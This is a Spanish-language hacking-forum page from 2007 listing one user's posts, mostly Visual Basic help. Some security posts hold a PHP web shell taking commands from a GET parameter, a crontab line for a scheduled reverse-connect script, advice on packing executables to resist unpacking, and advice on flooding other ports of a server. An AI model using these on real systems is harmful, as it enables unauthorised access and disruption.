elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 16:54  

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19
121  Programación / Programación VB / Re: Actualizar (Refrescar) Datagrid... en: 15 Octubre 2007, 05:28
Código
private sub command1_click()
datagrid1.refresh
end sub

122  Programación / Programación VB / Re: Como matar el proceso de la propia aplicacion en: 15 Octubre 2007, 01:41
Tambien se puede utilizar apis:
Código
Private Declare Function TerminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" Alias "GetCurrentProcess" () As Long

private sub command1_click()
terminateprocess getcurrentprocess, 0
end sub

Saludos ;)
123  Programación / Programación VB / Re: Eviar sms desde vb ¿? en: 14 Octubre 2007, 09:23
Checate como funciona esta pagina http://www.mensajesacelulares.net/, y podes a traves de sockets, programarte algo para que envie desde el formulario de la aplicacion las variables que se necesitan para enviar sms.
solo checa el codigo fuente donde dice post, y pasalo a visual :P

saludos ;)
124  Programación / Programación VB / Re: manejo de strings en: 14 Octubre 2007, 09:19
Código
Private Sub Command1_Click()
cadena = "blablablablablanlkablabajnkajnakj" & vbCrLf & _
"blablablablablanlkablabajnkajnakj" & vbCrLf & _
"Location: http://www.url.com"

headers = Split(cadena, vbCrLf)
For j = 0 To UBound(headers)
   headers2 = Split(headers(j), " ")(0)
   If LCase(headers2) = "location:" Then url = Replace(Split(headers(j), " ")(1), " ", ""): GoTo Escape
Next j
Escape:
MsgBox url
End Sub

algo mas peque :P

saludos!!
125  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 14 Octubre 2007, 09:09
Una pregunta :P, que tengo que saber para poder hacer el reto del agente secreto que mando el video, dobleojos, porq he mirado la imagen binariamente y no me sale nada...
algun soft?

bueno, saludos ;(
126  Seguridad Informática / Desafíos - Wargames / Re: Para los caballeros de: Binari0s® en: 14 Octubre 2007, 09:02
Lo q pasa fue que escogiste el .pwl equivocado ^^. el q tenes que crackear no demora ni un segundo!!!
hacelo con cain que te funciona a la perfeccion.

Saludos y que avances ;)
127  Programación / Programación VB / Re: Boton que muestre la hora en: 04 Octubre 2007, 23:19
Lo que discuto es que Now maneja una extension de string mas larga que Time, y por ende se ejecutan mas pasos  reserva mas espacio con Now que con Time, como dije antes Now = 03/10/2007 03:57:39 p.m. mientras que Time = 03:57:39 p.m.
Yo creo que ya es tema cerrado ^^

Saludos ;)
128  Programación / Programación VB / Re: codigo de encriptación en: 03 Octubre 2007, 23:06
Como dijo freeze el codigo fuente no se ve, ya que el visual compila el archivo para que la maquina lo entienda, lo que podes hacer es empacar el codigo con este prog: http://upx.sourceforge.net/, y luego modificarlo para que el mismo packer no lo pueda desempacar, aunque es facil quitar esta proteccion algunos no saben como :P.
el programa que modifica las cabeceras del upx es el arc pack cipher http://apokalypsiz.no-ip.org/aRC-Pack_Cipher_1.8__Instalador_.zip, la clave para abrir el ejecutable es www.arc3000.org

Saludos ;)

129  Programación / Programación VB / Re: proxys ... en: 03 Octubre 2007, 23:00
Floodear con proxies? pues es algo ilogico porque las proxies siempre tienden a tener un lag entre peticion y peticion, osea, vos haces la peticion y la mandas al proxy, el proxy luego hace la peticion a la pagina, se haria una doble peticion, con lo cual el tiempo seria el doble por cada peticion. Y peor aun, manejar varias proxies, es todo un lio...
Mejor cambia de server, o si la proteccion solo esta a nivel http, floodea otros puertos.

Saludos ;)
130  Programación / Programación VB / Re: Boton que muestre la hora en: 03 Octubre 2007, 22:57
Pues aer, no es necesario poner el timer para la fecha, se puede usar solo para la hora...
algo asi:
Código
private sub form_load()
text1.text = format(date, "dd/mm/yyyy")
end sub

private sub timer1_timer()
text2.text = format(time,"hh:mm:ss AMPM")
end sub

Uso el AMPM para que muestre si es a.m o p.m, pero depende de la configuracion regional de windows
format(time) y format(date), porque me parece que gasta menos memoria, ya que al hacer format(now), estas cogiendo una cadena de este tipo "03/10/2007 03:57:39 p.m.", mientras que con time se muestra solo "03:57:39 p.m." y con date "03/10/2007".

Bueno, saludos ;)
131  Seguridad Informática / Desafíos - Wargames / Re: Reto hacking.. en: 03 Octubre 2007, 22:49
Jajaja callate transek xDD
y no me imites con lo del rank ¬¬ vete a pgrankear a otra parte haha

lo mejor es juackear algunos servidores con pagerank de 5 para arriba ^^
ahora me pongo con la pagina de los puntos esos :P

saludos ;)
132  Seguridad Informática / Desafíos - Wargames / Re: Reto hacking.. en: 03 Octubre 2007, 05:24
Parece que te han juackiado ^^
133  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Firewall en: 04 Septiembre 2007, 07:06
El comodo, por esto de los resultados, me fio mas en pruebas hechas, que en meras suposiciones...
http://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php

Estamos hablando de seguridad, al comodo le faltan mas opciones, como las del zonealarm, pero es un groso, no deja pasar ni una, y a veces se convierte en una molestia si no se han configurado bien las reglas. Pero de todas formas, seguridad es seguridad :)
Saludos ;)
134  Seguridad Informática / Hacking Básico / Re: Como optener una shell con ftp en: 04 Septiembre 2007, 05:54
Jaja, nono, no te ofendas, yo solo queria corregirte, y muchas gracias por la explicacion ;)
Me van a tachar en el foro de malo por corregir xD
Bueno, saludos, ahora si me voy a dormir :)
135  Seguridad Informática / Hacking Básico / Re: Como optener una shell con ftp en: 04 Septiembre 2007, 05:40
Bueno, no me gusta corregir mucho, pero es mejor alejar la ignorancia de nuestras casas.
Buenas, podrias entrar al ftp subir un backdoor como por ejemplo el dc.pl
No es un Backdoor, el dc.pl es simplemente un script en perl que sirve para hacer conexiones inversas, el termino backdoor vendria siendo mas bien un servicio oculto que permite el ingreso a cualquier hora y fecha a un sistema. Aunque el propio autor lo bautize con el nombre Data Cha0s Connect Back Backdoor, eso de backdoor no me parece muy apropiado.
Mas bien, si se utilizara el crontab para hacer correr este script, n minuto n hora n dia n mes con determinado argumento, depronto si se podria considerar como un backdoor.
Código:
crontab -e;
0 2 * * 1-5 /home/user/www/dc.pl ip puerto
Para ejecutar el script de lunes a viernes a las 2 de la mañana, eso si, a esa hora debemos estar con el netcat a la escucha en determinado puerto, sin contar que el sistema este protegido por un firewall.

Código:
<html>
<?php
system($cmd);
?>
</html>
En vez de ese ejemplo, utiliza:
Código:
<?php
system($_GET['cmd']);
?>
Ya que si el servidor tiene la directiva register_globals en off, $cmd no se tomaria por medio de un get/post/cookies

buffer overflow, stack overflow o head overflow

No es Head Overflow, es Heap Overflow:http://www.w00w00.org/files/articles/heaptut.txt
Se me escapo mas cosas pero vaa, me voy a dormir :P

Saludos !
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.